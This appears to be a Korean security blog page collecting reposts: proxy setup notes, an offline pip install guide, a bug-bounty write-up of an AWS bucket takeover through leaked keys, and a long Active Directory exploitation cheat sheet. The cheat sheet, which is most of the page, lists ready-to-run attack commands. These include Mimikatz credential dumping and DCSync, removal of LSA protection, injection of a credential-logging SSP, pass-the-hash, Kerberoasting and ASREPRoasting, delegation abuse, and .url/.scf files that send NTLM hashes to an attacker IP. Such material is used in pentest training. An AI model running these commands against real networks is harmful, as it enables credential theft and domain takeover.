Fiddler 셋팅

경로 및 정보 2023. 11. 10. 10:55

 

Fiddler 내부망

 

Options > HTTPS > Decrypt

Conntection 8888 확인 > 브라우저 127.0.0.1 > 인증서 설치

Gateway > Manual Proxy Config > 127.0.0.1:8080 (Burp 포트 넘버)

 

캡처링 (F12) 체크한 뒤 Burp 통해서 패킷을 받아 봄

블로그 이미지

wtdsoul

,

https://seonu-lim.github.io/python/%EC%98%A4%ED%94%84%EB%9D%BC%EC%9D%B8%EC%97%90%EC%84%9C-%ED%8C%8C%EC%9D%B4%EC%8D%AC%ED%8C%A8%ED%82%A4%EC%A7%80-%EC%84%A4%EC%B9%98%ED%95%98%EA%B8%B0/

 

오프라인 상태에서 패키지를 설치하기?

이직한 곳에서는 보안 상의 이유로 VDI(Virtual Desktop Infra) 라는 것을 사용하는데, 나는 처음 접해보는 것이다보니 아직 익숙하지 않다. 모든 사내 데이터는 원칙적으로 VDI 내부에서만 존재하고, 허

seonu-lim.github.io

 

이직한 곳에서는 보안 상의 이유로 VDI(Virtual Desktop Infra) 라는 것을 사용하는데, 나는 처음 접해보는 것이다보니 아직 익숙하지 않다. 모든 사내 데이터는 원칙적으로 VDI 내부에서만 존재하고, 허가를 받아야 데이터의 반출이 가능하다. 사내 메신저나 메일도 VDI 안에서만 확인이 가능하다… 게다가 인터넷은 회사 홈페이지를 제외하고는 연결이 되지 않는다!

이렇게 폐쇄적인 환경이다보니, 개발이나 분석 툴로써 파이썬을 사용할 때에도 어려움이 따른다. 패키지들을 설치하려면 보통은 pip 이나 conda 를 사용하는데 인터넷 연결이 되지 않으니 패키지를 다운받는 게 정말 번거로운 일이 된다. 설상가상으로 나는 지금 회사에서 파이썬 교육 업무를 맡고 있어서, 아무것도 모르는 사람들이 VDI 에 패키지를 설치할 수 있도록 만들어주어야 한다. 따라서 최대한 간소한 방법을 서술하도록 하겠다.

우선 VDI 를 접속하는 로컬 컴퓨터는 몇몇 사이트를 제외하고 인터넷 연결이 되기 때문에 우선 로컬에서 원하는 패키지를 인스톨한다. 단, 우리 회사 인터넷망에서는 그냥 pip install foo 하면, 뭔 ssl certificate 이 어쩌구 하면서 에러가 난다. 그러므로 다음과 같이 argument를 더해주도록 한다.

pip --trusted-host pypi.org --trusted-host files.pythonhosted.org install foo

이렇게 다운받고 나서, 폴더를 하나 만들어서 shell 을 켜고 그곳으로 이동한다. 그리고 다음과 같이 다운로드 해준다.

pip --trusted-host pypi.org --trusted-host files.pythonhosted.org download foo

폴더에 foo 파일과 그의 dependency들도 같이 다운로드되어있을 것이다. 이것을 파일 전송 시스템으로 VDI 로 옮겨준다. VDI 에는 python만 깔려있다고 가정한다. 이제 파일 전송 시스템에서 받아온 파일들을 특정 경로에 저장해주고 shell 을 켠다.

python -m pip install --no-index -f . foo

오류가 난다면, whl 파일을 다운받았던 파이썬 버전과 패키지 인스톨하고자 하는 파이썬 버전이 다르지 않은지 확인해보자.

블로그 이미지

wtdsoul

,

https://medium.com/@pratyush1337/information-disclosure-via-misconfigured-aws-to-aws-bucket-takeover-6a6a66470d0e

 

Information Disclosure via Misconfigured AWS to AWS Bucket Takeover

Hey! Welcome to a new write up on my recent finding of a Misconfigured AWS bucket and how i was able to Take full control of the AWS…

medium.com

 

Information Disclosure via Misconfigured AWS to AWS Bucket Takeover

Hey! Welcome to a new write up on my recent finding of a Misconfigured AWS bucket and how i was able to Take full control of the AWS bucket.

I was checking out the website mainly for the IDOR Vulnerabilities as those are considered as High priority bugs and are paid in high range. I was trying to check every possible end-points to find any parameter to manipulate the numerical value so i fired up my burp suite and sent the request to spider tab to check out all the endpoints but i failed because they have encrypted every numerical value using salted algorithm.

As it was not possible to find any IDOR , i found an interesting endpoint where i was able to set my organization logo and there was a direct link to the logo which was residing at an AWS bucket. You can check below:

So i checked this logo by directly coping it and opening it in the new tab:

Basically i never though that i will find anything like this so i never thought of doing anything in any programs or private programs i have worked on but that day i thought that let’s go to origin directory of the file[in hacker’s language ../ ;)]. so i checked it by going to the origin directory as you can see:

Bingo! this was a proper Information disclosure due to Misconfigured ACL of the AWS bucket. I was happy and thought of reporting this directly but as a Hacker you are always overwhelmed and curious to find all the juicy information that might be possible to exploit. So without wasting any time , I went ahead to check out all the files getting listed in the Directory but before that i tried to access one of the file to check if the files are real or not.

Than i opened the file to see what is the content:

Now i am confident enough that all the files available here are legitimate[Use of sophisticated word to look geeky 🤓] and we can see all the internal files of the xyz company here with small tutorials , screenshot and this was an internal S3 bucket used for training and demonstration purposes, such as sharing screenshots of their products……I guess so now you can see why it’s Critical.

At that moment , I felt like it’s enough to report now but i took a chance and thought if there is something else the bucket is offering to compromise itself…Damn Is it possible? Let’s see what happens…. I started checking files with extensions, especially with .zip or .htm or .eml or .doc or .csv and while searching through the entire bucket[which consisted of more than 700+ files] and found the first zip file:

So i downloaded it and checked the contents:

After checking on the files of that zip , i figured out that it’s not going to offer me anything to compromise the AWS bucket. So i started searching for other zip files and found an interesting zip file in the AWS bucket:

Now i downloaded the file and opened to check the contents:

I checked all the files but the important file was the “document.wflow” , It has everything i required to TAKEOVER the AWS Bucket. Let’s check the content:

I was so happy to see this credentials but now the funny thing is that i don’t know what to do with that because Zero knowledge in AWS. So the best way i found was i asked one of my office colleague who is a Dev and works on AWS. He told me that , Go to google and download S3 Browser to start browsing the AWS bucket if you have the “access_key” and “secret_key” which was a very new learning experience in the field of my Web Application Penetration Testing. I was like:

 

So i downloaded it and started providing all the required credentials:

Boom!

The next thing i checked on the Access Control List permission on each directory and found a directory with full access:

With the full access to this directory now I am the Owner of this and i can upload any file i want , I can delete it and i can Delete the whole directory. I had all the access in the world but As you all know we are all ethical in what we do so to make a Proof Of Concept i uploaded a file:

Now to re-verify it I checked it in the public facing bucket with my uploaded file name.

 

Final check I pasted the filename in the URL and checked:

Damn! AWS Bucket Takeover!

Following my initial report and its review, they had promptly and fairly compensated me for letting them know about this bug. I am really thankful for that :)

'경로 및 정보' 카테고리의 다른 글

Fiddler 셋팅  (0) 2023.11.10
VDI python Package 설치  (0) 2023.11.08
Hacking Swagger-UI - from XSS to account takeovers  (0) 2023.11.02
Active Directory 정보 수집  (0) 2023.10.25
Active Directory Pentesting Resources  (1) 2023.10.25
블로그 이미지

wtdsoul

,

https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

 

Hacking Swagger-UI - from XSS to account takeovers

We have reported more than 60 instances of this bug across a wide range of bug bounty programs including companies like Paypal, Atlassian, Microsoft, GitLab, Yahoo, ...

blog.vidocsecurity.com

 

 

블로그 이미지

wtdsoul

,

https://adsecurity.org/

 

Active Directory Security – Active Directory & Enterprise Security, Methods to Secure Active Directory, Attack Methods & Effec

Jan 12 2020 Many are familiar with Active Directory, the on-premises directory and authentication system that is available with Windows Server, but exactly what is Azure Active Directory? Azure Active Directory (Azure AD or AAD) is a multi-tenant cloud dir

adsecurity.org

 

https://www.harmj0y.net/blog/

 

 

블로그 이미지

wtdsoul

,

https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/

 

Penetration Testing Active Directory, Part I

I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’…

hausec.com

 

https://theredteamlabs.com/active-directory-penetration-testing/

 

Active Directory Penetration Testing and Lab Setup - RedTeam

I had several clients come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical

theredteamlabs.com

 

 

블로그 이미지

wtdsoul

,

https://bhavsec.com/posts/active-directory-resources/

 

This post contains Active Directory Pentesting resources to prepare for new OSCP (2022) exam.

Youtube/Twitch Videos

Active Directory madness and the Esoteric Cult of Domain Admin! - alh4zr3d

TryHackMe - Advent of Cyber + Active Directory - tib3rius

Common Active Directory Attacks: Back to the Basics of Security Practices - TrustedSec

How to build an Active Directory Lab - The Cyber Mentor

Zero to Hero (Episode 8,9,10) - The Cyber Mentor

Blogs

Top Five Ways I Got Domain Admin on Your Internal Network before Lunch

https://medium.com/@Dmitriy_Area51/active-directory-penetration-testing-d9180bff24a1

https://book.hacktricks.xyz/windows/active-directory-methodology

https://zer1t0.gitlab.io/posts/attacking_ad/

Cheatsheets

https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

https://infosecwriteups.com/active-directory-penetration-testing-cheatsheet-5f45aa5b44ff

TryHackMe VIP/Free Labs

Active Directory Basics - Easy

Post-Exploitation Basics - Easy

Vulnnet Roasted - Easy

Attacktive Directory - Medium

raz0r black - Medium

Enterprise - Medium

Vulnnet Active - Medium

Zero Logon - Hard

TryHackMe Paid Labs ($10 - $60 / month)

Holo - Hard

Throwback - Easy

HackTheBox Subscription/Free Labs

Forest - Easy

Active - Easy

Fuse - Medium

Cascade - Medium

Monteverde - Medium

Resolute - Medium

Arkham - Medium

Mantis - Hard

APT - Insane

HackTheBox Pro Labs ($95 + $27/month)

Dante - Beginner

Offshore - Intermediate

RastaLabs - Intermediate

Cybernetics - Advanced

APT Labs - Advanced

HackTheBox Academy (Paid)

ActiveDirectory LDAP - Medium

ActiveDirectory Powerview - Medium

ActiveDirectory BloodHound - Medium

CyberSecLabs Walkthrough

Secret

Zero

Brute

Dictionary

Roast

Spray

Sync

Toast

Certifications

OSCP - Offensive Security Certified Professional - Offsec - Intermediate

CRTP - Certified Red Team Professional - Pentester Academy - Beginner

CRTE - Certified Red Team Expert - Pentester Academy - Expert

CRTO - Certified Red Team Operator - Zeropoint Security - Intermediate

Courses

Practical Ethical Hacking - TCM Security

Active Directory Pentesting Full Course - Red Team Hacking

Red Team Ethical Hacking - Beginner

Red Team Ethical Hacking - Intermediate

Tools and Repositories

Nishang

Mimikatz

Kekeo

Rubeus

Powersploit

Powercat

PowerUpSQL

HeidiSQL

Proving Grounds Playground - Offensive Security

Hutch, Heist & Vault

블로그 이미지

wtdsoul

,

Active Directory Exploitation Cheat Sheet

https://github.com/geeksniper/active-directory-pentest

 

GitHub - geeksniper/active-directory-pentest

Contribute to geeksniper/active-directory-pentest development by creating an account on GitHub.

github.com

https://github.com/geeksniper/active-directory-pentest

 

 

GitHub - geeksniper/active-directory-pentest

Contribute to geeksniper/active-directory-pentest development by creating an account on GitHub.

github.com

This cheat sheet contains common enumeration and attack methods for Windows Active Directory.

This cheat sheet is inspired by the PayloadAllTheThings repo.

Summary

Tools

Domain Enumeration

Using PowerView

Powerview v.3.0
Powerview Wiki

  • Get Current Domain: Get-Domain
  • Enumerate Other Domains: Get-Domain -Domain <DomainName>
  • Get Domain SID: Get-DomainSID
  • Get Domain Policy:
  •  
     
  • Get-DomainPolicy #Will show us the policy configurations of the Domain about system access or kerberos Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicy
  • Get Domain Controllers:
  • Get-DomainController
    Get-DomainController -Domain <DomainName>
     
  • Enumerate Domain Users:
  • #Save all Domain Users to a file
    Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
    
    #Will return specific properties of a specific user
    Get-DomainUser -Identity [username] -Properties DisplayName, MemberOf | Format-List
    
    #Enumerate user logged on a machine
    Get-NetLoggedon -ComputerName <ComputerName>
    
    #Enumerate Session Information for a machine
    Get-NetSession -ComputerName <ComputerName>
    
    #Enumerate domain machines of the current/specified domain where specific users are logged into
    Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromName
     
  • Enum Domain Computers:
  • Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
    
    #Enumerate Live machines
    Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
     
  • Enum Groups and Group Members:
  • #Save all Domain Groups to a file:
    Get-DomainGroup | Out-File -FilePath .\DomainGroup.txt
    
    #Return members of Specific Group (eg. Domain Admins & Enterprise Admins)
    Get-DomainGroup -Identity '<GroupName>' | Select-Object -ExpandProperty Member
    Get-DomainGroupMember -Identity '<GroupName>' | Select-Object MemberDistinguishedName
    
    #Enumerate the local groups on the local (or remote) machine. Requires local admin rights on the remote machine
    Get-NetLocalGroup | Select-Object GroupName
    
    #Enumerates members of a specific local group on the local (or remote) machine. Also requires local admin rights on the remote machine
    Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
    
    #Return all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
    Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
     
  • Enumerate Shares:
  • #Enumerate Domain Shares
    Find-DomainShare
    
    #Enumerate Domain Shares the current user has access
    Find-DomainShare -CheckShareAccess
    
    #Enumerate "Interesting" Files on accessible shares
    Find-InterestingDomainShareFile -Include *passwords*
     
  • Enum Group Policies:
  • Get-DomainGPO -Properties DisplayName | Sort-Object -Property DisplayName
    
    #Enumerate all GPOs to a specific computer
    Get-DomainGPO -ComputerIdentity <ComputerName> -Properties DisplayName | Sort-Object -Property DisplayName
    
    #Get users that are part of a Machine's local Admin group
    Get-DomainGPOComputerLocalGroupMapping -ComputerName <ComputerName>
     
  • Enum OUs:
  • Get-DomainOU -Properties Name | Sort-Object -Property Name
     
  • Enum ACLs:
  • # Returns the ACLs associated with the specified account
    Get-DomaiObjectAcl -Identity <AccountName> -ResolveGUIDs
    
    #Search for interesting ACEs
    Find-InterestingDomainAcl -ResolveGUIDs
    
    #Check the ACLs associated with a specified path (e.g smb share)
    Get-PathAcl -Path "\\Path\Of\A\Share"
     
  • Enum Domain Trust:
  • Get-DomainTrust
    Get-DomainTrust -Domain <DomainName>
    
    #Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds
    Get-DomainTrustMapping
     
  • Enum Forest Trust:
  • Get-ForestDomain
    Get-ForestDomain -Forest <ForestName>
    
    #Map the Trust of the Forest
    Get-ForestTrust
    Get-ForestTrust -Forest <ForestName>
     
  • User Hunting: Priv Esc to Domain Admin with User Hunting:
    I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> Profit!
  • #Finds all machines on the current domain where the current user has local admin access
    Find-LocalAdminAccess -Verbose
    
    #Find local admins on all machines of the domain
    Find-DomainLocalGroupMember -Verbose
    
    #Find computers were a Domain Admin OR a spesified user has a session
    Find-DomainUserLocation | Select-Object UserName, SessionFromName
    
    #Confirming admin access
    Test-AdminAccess
     

Using AD Module

  • Get Current Domain: Get-ADDomain
  • Enum Other Domains: Get-ADDomain -Identity <Domain>
  • Get Domain SID: Get-DomainSID
  • Get Domain Controlers:
  • Get-ADDomainController
    Get-ADDomainController -Identity <DomainName>
     
  • Enumerate Domain Users:
  • Get-ADUser -Filter * -Identity <user> -Properties *
    
    #Get a spesific "string" on a user's attribute
    Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
     
  • Enum Domain Computers:
  • Get-ADComputer -Filter * -Properties *
    Get-ADGroup -Filter *
     
  • Enum Domain Trust:
  • Get-ADTrust -Filter *
    Get-ADTrust -Identity <DomainName>
     
  • Enum Forest Trust:
  • Get-ADForest
    Get-ADForest -Identity <ForestName>
    
    #Domains of Forest Enumeration
    (Get-ADForest).Domains
     
  • Enum Local AppLocker Effective Policy:
  • Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
     

Using BloodHound

Remote BloodHound

Python BloodHound Repository or install it with pip3 install bloodhound

bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All
 

On Site BloodHound

#Using exe ingestor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>

#Using PowerShell module ingestor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --OutputDirectory <PathToFile>
 

Using Adalanche

Remote Adalanche

# kali linux:
./adalanche collect activedirectory --domain <Domain> \
--username <Username@Domain> --password <Password> \
--server <DC>

# Example:
./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb
## -> Terminating successfully

## Any error?:

# LDAP Result Code 200 "Network Error": x509: certificate signed by unknown authority ?

./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb --tlsmode NoTLS --port 389

# Invalid Credentials ?
./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb --tlsmode NoTLS --port 389 \
--authmode basic

# Analyze data 
# go to web browser -> 127.0.0.1:8080
./adalanche analyze
 

Useful Enumeration Tools

  • ldapdomaindump Information dumper via LDAP
  • adidnsdump Integrated DNS dumping by any authenticated user
  • ACLight Advanced Discovery of Privileged Accounts
  • ADRecon Detailed Active Directory Recon Tool

Local Privilege Escalation

Useful Local Priv Esc Tools

  • PowerUp Misconfiguration Abuse
  • BeRoot General Priv Esc Enumeration Tool
  • Privesc General Priv Esc Enumeration Tool
  • FullPowers Restore A Service Account's Privileges

Lateral Movement

PowerShell Remoting

#Enable PowerShell Remoting on current Machine (Needs Admin Access)
Enable-PSRemoting

#Entering or Starting a new PSSession (Needs Admin Access)
$sess = New-PSSession -ComputerName <Name>
Enter-PSSession -ComputerName <Name> OR -Sessions <SessionName>
 

Remote Code Execution with PS Credentials

$SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword)
Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami}
 

Import a PowerShell Module and Execute its Functions Remotely

#Execute the command and start a session
Invoke-Command -Credential $cred -ComputerName <NameOfComputer> -FilePath c:\FilePath\file.ps1 -Session $sess

#Interact with the session
Enter-PSSession -Session $sess
 

Executing Remote Stateful commands

#Create a new session
$sess = New-PSSession -ComputerName <NameOfComputer>

#Execute command on the session
Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}

#Check the result of the command to confirm we have an interactive session
Invoke-Command -Session $sess -ScriptBlock {$ps}
 

Mimikatz

#The commands are in cobalt strike format!

#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords

#(Over) Pass The Hash
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>

#List all available kerberos tickets in memory
mimikatz sekurlsa::tickets

#Dump local Terminal Services credentials
mimikatz sekurlsa::tspkg

#Dump and save LSASS in a file
mimikatz sekurlsa::minidump c:\temp\lsass.dmp

#List cached MasterKeys
mimikatz sekurlsa::dpapi

#List local Kerberos AES Keys
mimikatz sekurlsa::ekeys

#Dump SAM Database
mimikatz lsadump::sam

#Dump SECRETS Database
mimikatz lsadump::secrets

#Inject and dump the Domain Controler's Credentials
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject

#Dump the Domain's Credentials without touching DC's LSASS and also remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all

#List and Dump local kerberos credentials
mimikatz kerberos::list /dump

#Pass The Ticket
mimikatz kerberos::ptt <PathToKirbiFile>

#List TS/RDP sessions
mimikatz ts::sessions

#List Vault credentials
mimikatz vault::list
 

❗ What if mimikatz fails to dump credentials because of LSA Protection controls ?

  • LSA as a Protected Process (Kernel Land Bypass)
  • #Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
    reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
    
    #Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
    #Now lets import the mimidriver.sys to the system
    mimikatz # !+
    
    #Now lets remove the protection flags from lsass.exe process
    mimikatz # !processprotect /process:lsass.exe /remove
    
    #Finally run the logonpasswords function to dump lsass
    mimikatz # sekurlsa::logonpasswords
     
  • LSA as a Protected Process (Userland "Fileless" Bypass)
  • LSA is running as virtualized process (LSAISO) by Credential Guard
  • #Check if a process called lsaiso.exe exists on the running processes
    tasklist |findstr lsaiso
    
    #If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
    #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
    mimikatz # misc::memssp
    
    #Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
     
  • Detailed Mimikatz Guide
  • Poking Around With 2 lsass Protection Options

Remote Desktop Protocol

If the host we want to lateral move to has "RestrictedAdmin" enabled, we can pass the hash using the RDP protocol and get an interactive session without the plaintext password.

  • Mimikatz:
  • #We execute pass-the-hash using mimikatz and spawn an instance of mstsc.exe with the "/restrictedadmin" flag
    privilege::debug
    sekurlsa::pth /user:<Username> /domain:<DomainName> /ntlm:<NTLMHash> /run:"mstsc.exe /restrictedadmin"
    
    #Then just click ok on the RDP dialogue and enjoy an interactive session as the user we impersonated
     
  • xFreeRDP:
xfreerdp  +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /bpp:8  /u:<Username> /pth:<NTLMHash> /v:<Hostname | IPAddress>
 

❗ If Restricted Admin mode is disabled on the remote machine we can connect on the host using another tool/protocol like psexec or winrm and enable it by creating the following registry key and setting it's value zero: "HKLM:\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin".

URL File Attacks

  • .url file
    [InternetShortcut]
    URL=file://<AttackersIp>/leak/leak.html
    
     
  • [InternetShortcut]
    URL=whatever
    WorkingDirectory=whatever
    IconFile=\\<AttackersIp>\%USERNAME%.icon
    IconIndex=1
    
     
  • .scf file
  • [Shell]
    Command=2
    IconFile=\\<AttackersIp>\Share\test.ico
    [Taskbar]
    Command=ToggleDesktop
    
     

Putting these files in a writeable share the victim only has to open the file explorer and navigate to the share. Note that the file doesn't need to be opened or the user to interact with it, but it must be on the top of the file system or just visible in the windows explorer window in order to be rendered. Use responder to capture the hashes.

❗ .scf file attacks won't work on the latest versions of Windows.

Useful Tools

  • Powercat netcat written in powershell, and provides tunneling, relay and portforward capabilities.
  • SCShell fileless lateral movement tool that relies on ChangeServiceConfigA to run command
  • Evil-Winrm the ultimate WinRM shell for hacking/pentesting
  • RunasCs Csharp and open version of windows builtin runas.exe
  • ntlm_theft creates all possible file formats for url file attacks

Domain Privilege Escalation

Kerberoast

WUT IS DIS?:
All standard domain users can request a copy of all service accounts along with their correlating password hashes, so we can ask a TGS for any SPN that is bound to a "user"
account, extract the encrypted blob that was encrypted using the user's password and bruteforce it offline.

  • PowerView:
  • #Get User Accounts that are used as Service Accounts
    Get-NetUser -SPN
    
    #Get every available SPN account, request a TGS and dump its hash
    Invoke-Kerberoast
    
    #Requesting the TGS for a single account:
    Request-SPNTicket
    
    #Export all tickets using Mimikatz
    Invoke-Mimikatz -Command '"kerberos::list /export"'
     
  • AD Module:
  • #Get User Accounts that are used as Service Accounts
    Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
     
  • Impacket:
  • python GetUserSPNs.py <DomainName>/<DomainUser>:<Password> -outputfile <FileName>
     
  • Rubeus:
  • #Kerberoasting and outputing on a file with a spesific format
    Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName>
    
    #Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts
    Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /rc4opsec
    
    #Kerberoast AES enabled accounts
    Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /aes
    
    #Kerberoast spesific user account
    Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /user:<username> /simple
    
    #Kerberoast by specifying the authentication credentials
    Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /creduser:<username> /credpassword:<password>
     

ASREPRoast

WUT IS DIS?:
If a domain user account do not require kerberos preauthentication, we can request a valid TGT for this account without even having domain credentials, extract the encrypted
blob and bruteforce it offline.

  • PowerView: Get-DomainUser -PreauthNotRequired -Verbose
  • AD Module: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Forcefully Disable Kerberos Preauth on an account i have Write Permissions or more! Check for interesting permissions on accounts:

Hint: We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because Machine Account hashes are not crackable!

PowerView:

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
Disable Kerberos Preauth:
Set-DomainObject -Identity <UserAccount> -XOR @{useraccountcontrol=4194304} -Verbose
Check if the value changed:
Get-DomainUser -PreauthNotRequired -Verbose
 
  • And finally execute the attack using the ASREPRoast tool.
  • #Get a spesific Accounts hash:
    Get-ASREPHash -UserName <UserName> -Verbose
    
    #Get any ASREPRoastable Users hashes:
    Invoke-ASREPRoast -Verbose
     
  • Using Rubeus:
  • #Trying the attack for all domain users
    Rubeus.exe asreproast /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
    
    #ASREPRoast spesific user
    Rubeus.exe asreproast /user:<username> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
    
    #ASREPRoast users of a spesific OU (Organization Unit)
    Rubeus.exe asreproast /ou:<OUName> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
     
  • Using Impacket:
  • #Trying the attack for the specified users on the file
    python GetNPUsers.py <domain_name>/ -usersfile <users_file> -outputfile <FileName>
     

Password Spray Attack

If we have harvest some passwords by compromising a user account, we can use this method to try and exploit password reuse on other domain accounts.

Tools:

Force Set SPN

WUT IS DIS ?: If we have enough permissions -> GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its blob and bruteforce it.

  • PowerView:
  • #Check for interesting permissions on accounts:
    Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
    
    #Check if current user has already an SPN setted:
    Get-DomainUser -Identity <UserName> | select serviceprincipalname
    
    #Force set the SPN on the account:
    Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
     
  • AD Module:
  • #Check if current user has already an SPN setted
    Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName
    
    #Force set the SPN on the account:
    Set-ADUser -Identiny <UserName> -ServicePrincipalNames @{Add='ops/whatever1'}
     

Finally use any tool from before to grab the hash and kerberoast it!

Abusing Shadow Copies

If you have local administrator access on a machine try to list shadow copies, it's an easy way for Domain Escalation.

#List shadow copies using vssadmin (Needs Admnistrator Access)
vssadmin list shadows

#List shadow copies using diskshadow
diskshadow list shadows all

#Make a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
 
  1. You can dump the backuped SAM database and harvest credentials.
  2. Look for DPAPI stored creds and decrypt them.
  3. Access backuped sensitive files.

List and Decrypt Stored Credentials using Mimikatz

Usually encrypted credentials are stored in:

  • %appdata%\Microsoft\Credentials
  • %localappdata%\Microsoft\Credentials
#By using the cred function of mimikatz we can enumerate the cred object and get information about it:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"

#From the previous command we are interested to the "guidMasterKey" parameter, that tells us which masterkey was used to encrypt the credential
#Lets enumerate the Master Key:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>"

#Now if we are on the context of the user (or system) that the credential belogs to, we can use the /rpc flag to pass the decryption of the masterkey to the domain controler:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>" /rpc

#We now have the masterkey in our local cache:
dpapi::cache

#Finally we can decrypt the credential using the cached masterkey:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
 

Detailed Article: DPAPI all the things

Unconstrained Delegation

WUT IS DIS ?: If we have Administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a high value target or DA to connect to it, steal his TGT then ptt and impersonate him!

Using PowerView:

#Discover domain joined computers that have Unconstrained Delegation enabled
Get-NetComputer -UnConstrained

#List tickets and check if a DA or some High Value target has stored its TGT
Invoke-Mimikatz -Command '"sekurlsa::tickets"'

#Command to monitor any incoming sessions on our compromised server
Invoke-UserHunter -ComputerName <NameOfTheComputer> -Poll <TimeOfMonitoringInSeconds> -UserName <UserToMonitorFor> -Delay
<WaitInterval> -Verbose

#Dump the tickets to disk:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

#Impersonate the user using ptt attack:
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTicket>"'
 

Note: We can also use Rubeus!

Constrained Delegation

Using PowerView and Kekeo:

#Enumerate Users and Computers with constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

#If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo
tgt::ask /user:<UserName> /domain:<Domain's FQDN> /rc4:<hashedPasswordOfTheUser>

#Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation
tgs::s4u /tgt:<PathToTGT> /user:<UserToImpersonate>@<Domain's FQDN> /service:<Service's SPN>

#Finally use mimikatz to ptt the TGS
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTGS>"'
 

ALTERNATIVE: Using Rubeus:

Rubeus.exe s4u /user:<UserName> /rc4:<NTLMhashedPasswordOfTheUser> /impersonateuser:<UserToImpersonate> /msdsspn:"<Service's SPN>" /altservice:<Optional> /ptt
 

Now we can access the service as the impersonated user!

🚩 What if we have delegation rights for only a spesific SPN? (e.g TIME):

In this case we can still abuse a feature of kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services and not only for the one we have rights for. Thats gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine.

Resource Based Constrained Delegation

WUT IS DIS?:
TL;DR
If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate Domain Administrator and have complete access.

